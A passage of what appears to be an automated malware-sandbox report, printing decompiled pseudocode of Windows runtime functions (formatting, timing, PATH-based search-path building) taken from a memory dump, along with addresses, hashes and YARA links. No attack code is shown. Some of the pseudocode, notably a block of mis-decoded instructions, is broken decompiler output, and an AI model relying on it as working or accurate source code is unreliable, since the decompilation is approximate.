								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04AFA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x04abb171
0x04abb171
0x04abb171
0x04abb171
0x04abb171
0x04abb176
0x04abb17b
0x04abb180
0x04abb186
0x04abb18f
0x04abb198
0x04abb1a4
0x04abb1aa
0x04b14802
0x04b14802
0x04b14805
0x04b1480c
0x04b1480e
0x04abb1d1
0x04abb1d3
0x04abb1de
0x04abb1de
0x04b14817
0x04b1481e
0x04b14820
0x04b14822
0x04b14822
0x04b14824
0x04b14824
0x04b1482a
0x00000000
0x00000000
0x04b14835
0x04b1483a
0x04b1483d
0x04b1483f
0x04b14842
0x04b14842
0x04b14842
0x04b14846
0x04b1484c
0x04b1484e
0x04b14851
0x04b14851
0x04b14853
0x04b14854
0x04b14854
0x04b14858
0x04b1485a
0x04b1485a
0x04b1485d
0x04b1485f
0x04b14861
0x04b14861
0x04b14866
0x04b1486b
0x04b1486e
0x04b14871
0x04b14876
0x04b14876
0x04b14878
0x04b1487b
0x04b14884
0x04b14884
0x00000000
0x04b1487d
0x04b1487d
0x04b14882
0x04b14889
0x04b14889
0x04b1488f
0x04b14891
0x04b148e0
0x04b148e2
0x04b148e4
0x04b148e4
0x04b148e7
0x04b148e7
0x04b148ed
0x04b148f4
0x04b148f6
0x04b14951
0x04b14951
0x04b14953
0x04b14953
0x04b14956
0x04b14956
0x04b14958
0x04b14959
0x04b14959
0x04b1495d
0x04b1495d
0x04b1495f
0x04b1495f
0x04b14965
0x04b14969
0x04b149ba
0x04b149ba
0x04b149c1
0x04b149c5
0x04b149cc
0x04b149d4
0x04b149d7
0x04b149da
0x04b149e4
0x04b149e5
0x04b149f3
0x04b14a02
0x00000000
0x04b14a02
0x04b14972
0x04b14974
0x00000000
0x00000000
0x04b14976
0x04b14979
0x04b14982
0x04b14983
0x04b14984
0x04b1498b
0x04b1498d
0x04b14991
0x04b14993
0x04b14999
0x04b1499d
0x04b149a2
0x04b149a2
0x04b149a2
0x04b14999
0x04b149ac
0x00000000
0x04b149b3
0x04b148f8
0x04b148fe
0x00000000
0x00000000
0x00000000
0x04b148fe
0x04b14895
0x04b1489c
0x04b148ad
0x04b148b2
0x04b148b5
0x04b148b7
0x04b148ba
0x04b148bc
0x04b148c6
0x04b148c6
0x04b148cb
0x04b148d1
0x04b148d4
0x04b148d8
0x04b148d8
0x00000000
0x04b148d8
0x04b148be
0x04b148c0
0x00000000
0x00000000
0x04b148c2
0x00000000
0x00000000
0x00000000
0x04b148c4
0x00000000
0x04b14882
0x04b1487b
0x04b14904
0x04b14906
0x00000000
0x00000000
0x04b14908
0x04b1490e
0x00000000
0x00000000
0x04b14910
0x04b14917
0x04b14917
0x00000000
0x04b14917
0x04abb1ba
0x04b147f9
0x04b147fc
0x00000000
0x00000000
0x00000000
0x04b147fc
0x04abb1c0
0x04abb1c0
0x04abb1c3
0x04abb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 04B148AD

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: d098b6bab55a91cdfe3b58123b46f3656e6c738ad8cf5cd6e401df29e3daa531
Instruction ID: 1dbc435919cb56b6f32cd88a1f33df1a1d0e0b0eb41ba53476927f31272eb916
Opcode Fuzzy Hash: d098b6bab55a91cdfe3b58123b46f3656e6c738ad8cf5cd6e401df29e3daa531
Instruction Fuzzy Hash: 5151D171D002598EEF31CFA4C944BAEBBB0FF05714F6081EDE859AB2A1D7706945DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04ADB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04ADB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4bad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04AD7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04B88CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04AF9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04AFB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04AFCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04AD7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04B88F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04AFAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4ba8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4ba862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4ba8628; // 0x0
							_t116 =  *0x4ba862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x04adb94c
0x04adb956
0x04adb95c
0x04adb95e
0x04adb964
0x04adb969
0x04adb96d
0x04adb96d
0x04adb970
0x04adb974
0x04adb97a
0x04adbadf
0x04adbadf
0x04adbae2
0x04adbae4
0x04adbae6
0x04adbaf0
0x04b22cb8
0x04adbaf6
0x04adbaf6
0x04adbaf6
0x04adbafd
0x04adbb1f
0x04adbb1f
0x04adbaff
0x04adbb00
0x04adbb00
0x04adbb03
0x04adbb03
0x04adbacb
0x04adbacf
0x04adbad0
0x04adbad1
0x04adbadc
0x04adbadc
0x04adb980
0x04adb980
0x04adb988
0x04adb98b
0x04adb98d
0x04adb990
0x04adb993
0x04adb999
0x04adb99b
0x04adb9a1
0x04adb9a5
0x04adb9aa
0x04adb9b0
0x04adb9bb
0x04adb9c0
0x04adb9c3
0x04adb9ca
0x04adb9cc
0x04adb9cf
0x04adb9d3
0x04adb9d7
0x04adba94
0x04adba94
0x04adba98
0x04adbaa3
0x04b22ccb
0x04adbaa9
0x04adbaa9
0x04adbaa9
0x04adbab1
0x04b22cd5
0x04b22cdd
0x04b22cdd
0x04adbabb
0x04adbabc
0x04adbac2
0x04adbac3
0x04adbac3
0x04adbac6
0x00000000
0x04adb9dd
0x04adb9dd
0x04adb9e7
0x04adb9e7
0x04adb9ec
0x04adb9ec
0x04adb9f1
0x04adb9f5
0x04adb9fa
0x04adba00
0x04adba0c
0x04adba10
0x04adba10
0x04adba12
0x04adba18
0x00000000
0x00000000
0x04adbb26
0x04adbb26
0x04adba1e
0x04adba1e
0x04adba23
0x04adba25
0x04adba2c
0x04adba30
0x04adba35
0x04adba35
0x04adba41
0x04adba46
0x04adba4c
0x04adba50
0x04adba54
0x04adba6a
0x04adba6e
0x04adba70
0x04adba74
0x04adba78
0x04adba7a
0x04adba7c
0x04adba8e
0x04adba90
0x04adba92
0x04adbb14
0x04adbb14
0x04adbb16
0x04adbb16
0x00000000
0x04adba7c
0x04adbb0a
0x04adbb0d
0x00000000
0x00000000
0x00000000
0x04adbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ADB9A5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 66d3f0caf8fbe735d67d7b7efa8bf0bdaa66d0b2bfbd31d63f26d6892fee45e4
Instruction ID: b63408edafecbdbb2855b247c71feb9a231c2bc4066547370bbaf06afab48018
Opcode Fuzzy Hash: 66d3f0caf8fbe735d67d7b7efa8bf0bdaa66d0b2bfbd31d63f26d6892fee45e4
Instruction Fuzzy Hash: 06514771A08341CFD724DF29C58092ABBF5FB88654F55896EF58687354E730F844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04AE2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E04AE2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t236;
				signed int _t240;
				signed int _t255;
				signed int _t257;
				intOrPtr _t259;
				signed int _t262;
				signed int _t269;
				signed int _t272;
				signed int _t280;
				intOrPtr _t286;
				signed int _t288;
				signed int _t290;
				void* _t292;
				signed int _t293;
				unsigned int _t296;
				signed int _t300;
				void* _t301;
				signed int _t302;
				signed int _t306;
				intOrPtr _t321;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				void* _t345;
				void* _t348;
				void* _t349;

				_t342 = _t344;
				_t345 = _t344 - 0x4c;
				_v8 =  *0x4bad360 ^ _t342;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t337 = 0x4bab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t296 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t349 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t286 = 0x48;
				_t316 = 0 | _t349 == 0x00000000;
				_t330 = 0;
				_v37 = _t349 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t286 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t338 = 0xc0000106;
						goto L32;
					} else {
						_t337 = L04AD4620(_t296,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
						_v52 = _t337;
						__eflags = _t337;
						if(_t337 == 0) {
							_t338 = 0xc0000017;
							goto L32;
						} else {
							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
							_t50 = _t337 + 0x48; // 0x48
							_t332 = _t50;
							_t316 = _v32;
							 *((intOrPtr*)(_t337 + 0x3c)) = _t286;
							_t288 = 0;
							 *((short*)(_t337 + 0x30)) = _v48;
							__eflags = _t316;
							if(_t316 != 0) {
								 *(_t337 + 0x18) = _t332;
								__eflags = _t316 - 0x4ba8478;
								 *_t337 = ((0 | _t316 == 0x04ba8478) - 0x00000001 & 0xfffffffb) + 7;
								E04AFF3E0(_t332,  *((intOrPtr*)(_t316 + 4)),  *_t316 & 0x0000ffff);
								_t316 = _v32;
								_t345 = _t345 + 0xc;
								_t288 = 1;
								__eflags = _a8;
								_t332 = _t332 + (( *_t316 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t280 = E04B439F2(_t332);
									_t316 = _v32;
									_t332 = _t280;
								}
							}
							_t300 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t338 = _v68;
								__eflags = 0;
								 *((short*)(_t332 - 2)) = 0;
								goto L32;
							} else {
								_t290 = _t337 + _t288 * 4;
								_v56 = _t290;
								do {
									__eflags = _t316;
									if(_t316 != 0) {
										_t236 =  *(_v60 + _t300 * 4);
										__eflags = _t236;
										if(_t236 == 0) {
											goto L30;
										} else {
											__eflags = _t236 == 5;
											if(_t236 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t290 =  *(_v60 + _t300 * 4);
										 *(_t290 + 0x18) = _t332;
										_t240 =  *(_v60 + _t300 * 4);
										__eflags = _t240 - 8;
										if(_t240 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t240 * 4 +  &M04AE2959))) {
												case 0:
													__ax =  *0x4ba8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04AFF3E0(__edi,  *0x4ba848c, __ax & 0x0000ffff);
														__eax =  *0x4ba8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04AFF3E0(_t332, _v80, _v64);
													_t275 = _v64;
													goto L26;
												case 2:
													 *0x4ba8480 & 0x0000ffff = E04AFF3E0(__edi,  *0x4ba8484,  *0x4ba8480 & 0x0000ffff);
													__eax =  *0x4ba8480 & 0x0000ffff;
													__eax = ( *0x4ba8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04AFF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04AFF3E0(_t332, _v76, _v36);
														_t275 = _v36;
													}
													L26:
													_t345 = _t345 + 0xc;
													_t332 = _t332 + (_t275 >> 1) * 2 + 2;
													__eflags = _t332;
													L27:
													_push(0x3b);
													_pop(_t277);
													 *((short*)(_t332 - 2)) = _t277;
													goto L28;
												case 6:
													__ebx =  *0x4ba575c;
													__eflags = __ebx - 0x4ba575c;
													if(__ebx != 0x4ba575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04AFF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4ba575c;
														} while (__ebx != 0x4ba575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4ba8478 & 0x0000ffff = E04AFF3E0(__edi,  *0x4ba847c,  *0x4ba8478 & 0x0000ffff);
													__eax =  *0x4ba8478 & 0x0000ffff;
													__eax = ( *0x4ba8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04B439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4ba6e58 & 0x0000ffff = E04AFF3E0(__edi,  *0x4ba6e5c,  *0x4ba6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4ba6e58 & 0x0000ffff;
													__eax = ( *0x4ba6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t300 = _v16;
													_t316 = _v32;
													L29:
													_t290 = _t290 + 4;
													__eflags = _t290;
													_v56 = _t290;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t300 = _t300 + 1;
									_v16 = _t300;
									__eflags = _t300 - _v48;
								} while (_t300 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t240 =  *(_v60 + _t330 * 4);
						if(_t240 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t240 * 4 +  &M04AE2935))) {
							case 0:
								__ax =  *0x4ba8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t316 =  &_v64;
								_v80 = E04AE2E3E(0,  &_v64);
								_t286 = _t286 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4ba8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4ba8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04ACEEF0(0x4ba79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04ACEB70(__ecx, 0x4ba79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t214 = _v72;
											__eflags = _t214;
											if(_t214 != 0) {
												L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
											}
											_t215 = _v52;
											__eflags = _t215;
											if(_t215 != 0) {
												__eflags = _t338;
												if(_t338 < 0) {
													L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
													_t215 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t296 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4ba7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04ACEB70(__ecx, 0x4ba79a0);
										__eax = _v52;
										L36:
										_pop(_t331);
										_pop(_t339);
										__eflags = _v8 ^ _t342;
										_pop(_t287);
										return E04AFB640(_t215, _t287, _v8 ^ _t342, _t316, _t331, _t339);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t282 = _v56;
								if(_v56 != 0) {
									_t316 =  &_v36;
									_t284 = E04AE2E3E(_t282,  &_v36);
									_t296 = _v36;
									_v76 = _t284;
								}
								if(_t296 == 0) {
									goto L44;
								} else {
									_t286 = _t286 + 2 + _t296;
								}
								goto L14;
							case 6:
								__eax =  *0x4ba5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4ba8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4ba8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4ba6e58 & 0x0000ffff;
								__eax = ( *0x4ba6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t330 = _t330 + 1;
								if(_t330 >= _v48) {
									goto L16;
								} else {
									_t316 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t301 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("scasb");
					 *((intOrPtr*)(_t337 - 0x51d81ffc)) =  *((intOrPtr*)(_t337 - 0x51d81ffc)) - _t301;
					asm("scasb");
					 *((intOrPtr*)(_t337 - 0x51d9fafc)) =  *((intOrPtr*)(_t337 - 0x51d9fafc)) - _t301;
					 *((intOrPtr*)(_t337 - 0x4da4cafc)) =  *((intOrPtr*)(_t337 - 0x4da4cafc)) - _t301;
					 *((intOrPtr*)(_t337 - 0x51d77ffc)) =  *((intOrPtr*)(_t337 - 0x51d77ffc)) - _t342;
					asm("daa");
					asm("scasb");
					 *((intOrPtr*)(_t337 - 0x51d7b1fc)) =  *((intOrPtr*)(_t337 - 0x51d7b1fc)) - _t301;
					asm("daa");
					asm("scasb");
					_pop(_t292);
					asm("scasb");
					_pop(_t348);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4b8ff00);
					E04B0D08C(_t292, _t332, _t337);
					_v44 =  *[fs:0x18];
					_t333 = 0;
					 *_a24 = 0;
					_t293 = _a12;
					__eflags = _t293;
					if(_t293 == 0) {
						_t255 = 0xc0000100;
					} else {
						_v8 = 0;
						_t340 = 0xc0000100;
						_v52 = 0xc0000100;
						_t257 = 4;
						while(1) {
							_v40 = _t257;
							__eflags = _t257;
							if(_t257 == 0) {
								break;
							}
							_t306 = _t257 * 0xc;
							_v48 = _t306;
							__eflags = _t293 -  *((intOrPtr*)(_t306 + 0x4a91664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t272 = E04AFE5C0(_a8,  *((intOrPtr*)(_t306 + 0x4a91668)), _t293);
									_t348 = _t348 + 0xc;
									__eflags = _t272;
									if(__eflags == 0) {
										_t340 = E04B351BE(_t293,  *((intOrPtr*)(_v48 + 0x4a9166c)), _a16, _t333, _t340, __eflags, _a20, _a24);
										_v52 = _t340;
										break;
									} else {
										_t257 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t257 = _t257 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t340;
						__eflags = _t340;
						if(_t340 < 0) {
							__eflags = _t340 - 0xc0000100;
							if(_t340 == 0xc0000100) {
								_t302 = _a4;
								__eflags = _t302;
								if(_t302 != 0) {
									_v36 = _t302;
									__eflags =  *_t302 - _t333;
									if( *_t302 == _t333) {
										_t340 = 0xc0000100;
										goto L76;
									} else {
										_t321 =  *((intOrPtr*)(_v44 + 0x30));
										_t259 =  *((intOrPtr*)(_t321 + 0x10));
										__eflags =  *((intOrPtr*)(_t259 + 0x48)) - _t302;
										if( *((intOrPtr*)(_t259 + 0x48)) == _t302) {
											__eflags =  *(_t321 + 0x1c);
											if( *(_t321 + 0x1c) == 0) {
												L106:
												_t340 = E04AE2AE4( &_v36, _a8, _t293, _a16, _a20, _a24);
												_v32 = _t340;
												__eflags = _t340 - 0xc0000100;
												if(_t340 != 0xc0000100) {
													goto L69;
												} else {
													_t333 = 1;
													_t302 = _v36;
													goto L75;
												}
											} else {
												_t262 = E04AC6600( *(_t321 + 0x1c));
												__eflags = _t262;
												if(_t262 != 0) {
													goto L106;
												} else {
													_t302 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t340 = E04AE2C50(_t302, _a8, _t293, _a16, _a20, _a24, _t333);
											L76:
											_v32 = _t340;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t340 = _a24;
									_t269 = E04AE2AE4( &_v36, _a8, _t293, _a16, _a20, _t340);
									_v32 = _t269;
									__eflags = _t269 - 0xc0000100;
									if(_t269 == 0xc0000100) {
										_v32 = E04AE2C50(_v36, _a8, _t293, _a16, _a20, _t340, 1);
									}
									_v8 = _t333;
									E04AE2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t255 = _t340;
					}
					L70:
					return E04B0D0D1(_t255);
				}
				L108:
			}

0x04ae2584
0x04ae2586
0x04ae2590
0x04ae2596
0x04ae2597
0x04ae2598
0x04ae2599
0x04ae259e
0x04ae25a4
0x04ae25a9
0x04ae25ac
0x04ae25ae
0x04ae25b1
0x04ae25b2
0x04ae25b5
0x04ae25b8
0x04ae25bb
0x04ae25bc
0x04ae25bf
0x04ae25c2
0x04ae25c5
0x04ae25c6
0x04ae25cb
0x04ae25ce
0x04ae25d8
0x04ae25db
0x04ae25dd
0x04ae25de
0x04ae25e1
0x04ae25e3
0x04ae25e9
0x04ae26da
0x04ae26da
0x04ae26dd
0x04ae26e2
0x04b25b56
0x00000000
0x04ae26e8
0x04ae26f9
0x04ae26fb
0x04ae26fe
0x04ae2700
0x04b25b60
0x00000000
0x04ae2706
0x04ae2706
0x04ae270a
0x04ae270a
0x04ae270d
0x04ae2713
0x04ae2716
0x04ae2718
0x04ae271c
0x04ae271e
0x04b25b6c
0x04b25b6f
0x04b25b7f
0x04b25b89
0x04b25b8e
0x04b25b93
0x04b25b96
